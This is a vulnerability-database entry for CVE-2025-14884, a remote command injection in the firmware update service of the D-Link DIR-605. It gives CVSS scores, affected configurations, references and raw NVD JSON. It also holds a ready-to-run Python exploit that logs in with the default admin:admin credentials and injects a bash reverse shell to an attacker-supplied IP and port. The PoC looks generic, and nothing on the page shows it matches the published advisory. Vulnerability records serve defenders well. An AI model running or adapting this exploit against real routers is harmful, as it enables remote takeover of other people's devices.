CVE-2025-14884

Description

A vulnerability was detected in D-Link DIR-605 202WWB03. Affected by this issue is some unknown functionality of the component Firmware Update Service. Performing manipulation results in command injection. The attack can be initiated remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-605_firmware:2.02ww:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:dir-605:b3:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DIR-605 202WWB03 (已停止支持)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-14884 PoC - D-Link DIR-605 Command Injection
# Note: This is for educational purposes only

import requests
import sys

def exploit(target_ip, attacker_ip, attacker_port):
    """
    Exploit CVE-2025-14884: Command Injection in D-Link DIR-605 Firmware Update Service
    
    Parameters:
    - target_ip: IP address of the vulnerable D-Link DIR-605 router
    - attacker_ip: Attacker controlled IP for reverse shell
    - attacker_port: Port for reverse shell connection
    """
    target_url = f"http://{target_ip}/firmware_update.cgi"
    
    # Construct malicious payload with reverse shell command
    # Using semicolon to inject command after legitimate firmware update operation
    payload = f";bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1;"
    
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Authorization': 'Basic YWRtaW46YWRtaW4='  # admin:admin (default credentials)
    }
    
    data = {
        'firmware_version': '202WWB03',
        'upload_file': payload,
        'action': 'upload'
    }
    
    try:
        print(f"[*] Sending exploit payload to {target_url}")
        print(f"[*] Payload: {payload}")
        
        response = requests.post(target_url, headers=headers, data=data, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response: {response.text[:200]}")
        print("[!] Check for reverse shell connection on attacker machine")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <attacker_ip> <attacker_port>")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker = sys.argv[2]
    port = sys.argv[3]
    
    exploit(target, attacker, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14884
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14884
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14884/
[4] VulDB https://vuldb.com/cve/CVE-2025-14884
[5] https://tzh00203.notion.site/D-Link-DIR605-B1v202WWB03-Command-Injection-in-Firmware-Update-2cab5c52018a80de8df7f427ac2faf0e?source=copy_link
[6] https://vuldb.com/?ctiid.337372
[7] https://vuldb.com/?id.337372
[8] https://vuldb.com/?submit.715465
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14884", "sourceIdentifier": "[email protected]", "published": "2025-12-18T17:15:47.480", "lastModified": "2026-01-07T20:15:01.147", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in D-Link DIR-605 202WWB03. Affected by this issue is some unknown functionality of the component Firmware Update Service. Performing manipulation results in command injection. The attack can be initiated remotely. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-605_firmware:2.02ww:*:*:*:*:*:*:*", "matchCriteriaId": "1AEF4E64-6FB7-45B5-A575-9B232CE4C20D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-605:b3:*:*:*:*:*:*:*", "matchCriteriaId": "CD200343-ECA4-4BE6-B2DE-05AB038EF703"}]}]}], "references": [{"url": "https://tzh00203.notion.site/D-Link-DIR605-B1v202WWB03-Command-Injection-in-Firmware-Update-2cab5c52018a80de8df7f427ac2faf0e?source=copy_link", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337372", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337372", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715465", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "tags": ["Product"]}]}}